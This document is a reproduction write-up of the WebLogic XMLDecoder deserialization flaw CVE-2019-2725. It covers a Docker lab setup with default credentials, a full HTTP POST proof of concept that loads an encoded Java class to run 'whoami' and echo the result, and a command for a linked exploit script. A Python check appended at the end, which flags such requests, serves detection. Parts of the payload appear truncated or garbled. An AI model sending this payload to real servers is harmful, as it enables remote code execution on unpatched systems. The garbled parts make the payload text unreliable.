WebLogic Deserialization Remote Code Execution Vulnerability (CVE-2019-2725) Reproduction
Introduction
WebLogic is an application server produced by the US company Oracle; more precisely, it is middleware built on the Java EE architecture. WebLogic is a Java application server used to develop, integrate, deploy and manage large distributed web applications, network applications and database applications.
Affected versions
Oracle WebLogic Server 10.*
Oracle WebLogic Server 12.1.3
Environment setup
Docker is used here.
Pull the image and run it:
docker pull ismaleiva90/weblogic12
docker run -d -p 49163:7001 -p 49164:7002 -p 49165:5556 ismaleiva90/weblogic12:latest
User: weblogic
Pass: welcome1
Vulnerability reproduction
PoC
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 127.0.0.1:49163
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
Content-Type: text/xml
Content-Length: 4405
<soapenv:Envelope xmlns:soapenv="/soap/envelope/" xmlns:wsa="/2005/08/addressing" xmlns:asy="www.bea <java>
<class><string>EventData</string>
<void>
<string>
<java>
<void class="sun.misc.BASE64Decoder">
<void method="decodeBuffer" id="byte_arr"> <string>yv66vgAAADIAYwoAFAA8CgA9AD4KAD0APwoAQABBBwBCCgAFAEMHAEQKAAcARQgARgoABwBHBw    </void>
</void>
<void class="illa.classfile.DefiningClassLoader">
<void method="defineClass">
<string>ResultBaseExec</string>
<object idref="byte_arr"></object>
<void method="newInstance">
<void method="do_exec" id="result">
<string>whoami</string>
</void>
</void>
</void>
</void>
<void class="java.lang.Thread" method="currentThread">
<void method="getCurrentWork" id="current_work">
<void method="getClass">
<void method="getDeclaredField">
<string>connectionHandler</string>
<void method="setAccessible"><boolean>true</boolean></void>
<void method="get">
<void method="get">
<object idref="current_work"></object>
<void method="getServletRequest">
<void method="getResponse">
<void method="getServletOutputStream">
<void method="writeStream">
<object class="l.util.StringInputStream"><object idref="result"></object></object>            </void>
<void method="flush"/>
</void>
<void method="getWriter"><void method="write"><string></string></void></void>
</void>
</void>
</void>
</void>
</void>
</void>
</void>
</java>
</string>
</void>
</class>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>
Build and send the packet
Script address:
github/TopScrew/CVE-2019-2725.git
python3 CVE-2019-2725.py 12.1.3 127.0.0.1:49163 id
Executed successfully.
Remediation: upgrade to a secure version.
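As an added example (not part of the original write-up or the linked script), the following detection check flags raw HTTP requests shaped like the PoC above: a POST to the /wls-wsat/ endpoint whose XML body carries XMLDecoder constructs (a `<java>` document, `sun.misc.BASE64Decoder`, `DefiningClassLoader`) that a legitimate WS-Coordination request never contains. The sample requests, the `Verdict` type and the `inspect_request` function are all constructed for this example.

```python
import re
from dataclasses import dataclass, field

# Indicators taken from the PoC above: the vulnerable WS-AT endpoint and the
# XMLDecoder elements the payload needs to define and run a class.
WSAT_PATH = re.compile(r"^POST\s+/wls-wsat/\S*", re.I)
XMLDECODER_MARKERS = (
    "<java",                    # XMLDecoder root element inside WorkContext
    "sun.misc.BASE64Decoder",   # inline class bytes
    "DefiningClassLoader",      # class definition from those bytes
    'method="defineClass"',
    "java.lang.Thread",         # reflection into the current request thread
)

@dataclass
class Verdict:
    suspicious: bool
    reasons: list = field(default_factory=list)

def inspect_request(raw: str) -> Verdict:
    """Split a raw HTTP request into request line, headers and body and flag
    POSTs to /wls-wsat/ whose XML body contains XMLDecoder markers. The path
    alone is not enough: a request to the endpoint without markers is not flagged."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.splitlines()
    request_line = lines[0] if lines else ""
    headers = {}
    for h in lines[1:]:
        k, _, v = h.partition(":")
        headers[k.strip().lower()] = v.strip()
    reasons = []
    if not WSAT_PATH.match(request_line):
        return Verdict(False, reasons)
    reasons.append("POST to /wls-wsat/ endpoint")
    if "xml" in headers.get("content-type", "").lower():
        hits = [m for m in XMLDECODER_MARKERS if m in body]
        if hits:
            reasons.append("XMLDecoder markers in body: " + ", ".join(hits))
    return Verdict(len(reasons) > 1, reasons)

# Constructed sample requests (not captured traffic). The second mirrors the
# PoC's shape: a WorkContext header carrying an XMLDecoder <java> document.
BENIGN = ("POST /wls-wsat/CoordinatorPortType HTTP/1.1\nHost: 127.0.0.1:49163\n"
          "Content-Type: text/xml\n\n<soapenv:Envelope><soapenv:Body>"
          "<asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>")
MALICIOUS = ("POST /wls-wsat/CoordinatorPortType HTTP/1.1\nHost: 127.0.0.1:49163\n"
             "Content-Type: text/xml\n\n<soapenv:Envelope><soapenv:Header>"
             "<work:WorkContext><java><void class=\"sun.misc.BASE64Decoder\">"
             "<void method=\"decodeBuffer\"/></void></java></work:WorkContext>"
             "</soapenv:Header></soapenv:Envelope>")

if __name__ == "__main__":
    for name, req in (("benign", BENIGN), ("malicious", MALICIOUS)):
        v = inspect_request(req)
        print(name, v.suspicious, v.reasons)
```

In a WAF or proxy log pipeline the same check can run over each request body; the only remediation is still the vendor patch, this check just surfaces attempts against an unpatched server.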